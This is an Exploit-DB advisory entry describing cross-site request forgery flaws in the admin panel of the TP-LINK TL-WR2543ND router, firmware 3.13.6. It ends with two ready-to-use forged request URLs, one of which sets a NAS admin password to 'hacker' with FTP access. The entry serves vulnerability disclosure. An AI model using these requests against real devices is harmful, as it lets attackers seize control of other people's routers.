TP-LINK TL-WR2543ND Admin Panel Multiple Cross Site Request Forgery Vulnerabilities

2013-02-08T00:00:00
ID EDB-ID:38308
Type exploitdb
Reporter Juan Manuel Garcia
Modified 2013-02-08T00:00:00

Description

TP-LINK TL-WR2543ND Admin Panel Multiple Cross Site Request Forgery Vulnerabilities. Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/57877/info

TP-LINK TL-WR2543ND is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. 

Exploiting these issues may allow a remote attacker to change a device's configuration and perform other unauthorized actions. 

TP-LINK TL-WR2543ND 3.13.6 Build 110923 is vulnerable; other versions may also be affected.

http://www.example.com/userRpm/NasUserAdvRpm.htm?nas_admin_pwd=hacker&nas_admin_confirm_pwd=hacker&nas_admin_authority=1&nas_admin_ftp=1&Modify=1&Save=Save

http://www.example.com/userRpm/BasicSecurityRpm.htm?stat=983040&Save=Save